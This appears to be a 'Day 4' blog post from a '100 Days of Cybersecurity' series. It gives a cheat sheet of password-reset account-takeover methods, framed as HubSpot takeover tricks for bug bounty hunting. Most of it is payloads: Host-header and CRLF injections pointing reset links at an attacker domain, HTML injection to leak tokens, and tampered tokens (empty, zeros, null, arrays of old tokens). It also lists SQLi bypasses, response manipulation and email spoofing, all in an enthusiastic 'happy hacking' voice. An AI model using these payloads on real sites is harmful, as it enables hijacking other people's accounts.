100 Day's Of Cybersecurity - Day 4
Hey, hacking enthusiasts! Ready to uncover some mind-blowing tricks? Dive into these HubSpot Full Account Takeover methods and master the hackerโs playbook!
๐ง Using Your Token on Victimsโ Email
1
2
POST /reset
email=victim@gmail.com&token=$YOUR-TOKEN$
Imagine slipping into someoneโs email fortress with a cleverly placed token. ๐ต๏ธโโ๏ธ
๐ Host Header Injection
1
2
3
POST /reset
Host: attacker.com
email=victim@gmail.com`
Messing with the host header to sow confusion. Crafty, right?
๐ญ HTML Injection in Host Header
1
2
3
POST /reset
Host: attacker">.com
email=victim@gmail.com
Why settle for ordinary when you can inject style into your hacks? ๐
๐ต๏ธ Leakage of Password Reset in Referer Header
Referrer: https://website.com/reset?token=1234
Spotting hidden treasures in the Referer Header - a classic move in the hackerโs handbook.
๐ญ Using Companies Email
1
2
3
4
5
6
7
8
While inviting users into your account/organization, you can also try inviting company emails and add a
new field "password": "example123". or "pass": "example123" in the request. you may end up resetting a user password
Company emails can be found on target's GitHub Repos members or you can check on http://hunter.io. some users
have a feature to set a password for invited emails, so here we can try adding a pass parameter.
If successful, we can use those credentials to login into the account, SSO integrations, support panels,
etc
Mixing business with pleasure by exploiting the power of company emails. ๐ข๐ป
๐ช CRLF in URL
/resetPassword?0a%0dHost:atracker.tld
Breaking into the reset realm with CRLF magic. ๐ช
๐ฌ HTML Injection in Email
HTML injection in email via parameters, cookie, etc > inject image > leak the token
Crafting emails that are not just messages but gateways to breach security. ๐ป๐
๐ฎ Remove Token
/reset?eamil=victims@gmail.com&token=
Playing hide and seek with tokens - remove, replace, and conquer. ๐ต๏ธโโ๏ธ๐ญ
๐ Change it to 0000
/reset?eamil=victims@gmail.com&token=0000000000
Transforming tokens like a digital alchemist. โจ
๐ซ Use Null Value
/reset?eamil=victims@gmail.com&token=Null/nil
Because sometimes, nothing is more powerful than Null. ๐งโโ๏ธ
๐ฒ Try an Array of Old Tokens
/reset?eamil=victims@gmail.com&token=[oldtoken1,oldtoken2]
Rolling the dice with a repertoire of old tokens. ๐ฒ
๐ต๏ธ SQLi Bypass
try sqli bypass and wildcard or, %, *
In the quest for knowledge, SQLi becomes the secret language. ๐คซ๐
๐ Request Method / Content Type
change request method (get, put, post etc) and/or content type (xml<>json)
Mastering the art of disguise - because not all requests are created equal. ๐ญ
๐ Response Manipulation
Replace bad response and replace with good one
Turning the tables by manipulating responses. Itโs like playing chess with code. โ๏ธ
๐ Massive Token
/reset?eamil=victims@gmail.com&token=1000000 long string
Unleashing the power of the colossal token - because size does matter in the hacking world. ๐
๐ Crossdomain Token Usage
If a program has multiple domains using the same underlying reset mechanism...
Navigating through domains like a digital acrobat - because sometimes, tokens transcend boundaries. ๐
Final Notes ๐
๐ Leaking Reset Token in Response Body
๐ Change 1 Char at the Begin/End to See if the Token is Evaluated
๐ฌ Use Unicode Char Jutsu to Spoof Email Address
โฑ๏ธ Look for Race Conditions
๐ Try to Register the Same Mail with Different TLD (.eu, .net, etc)
Hope you enjoy this adventure into the world of bug bounty hunting! Happy hacking!
Bugbounty Checklist โ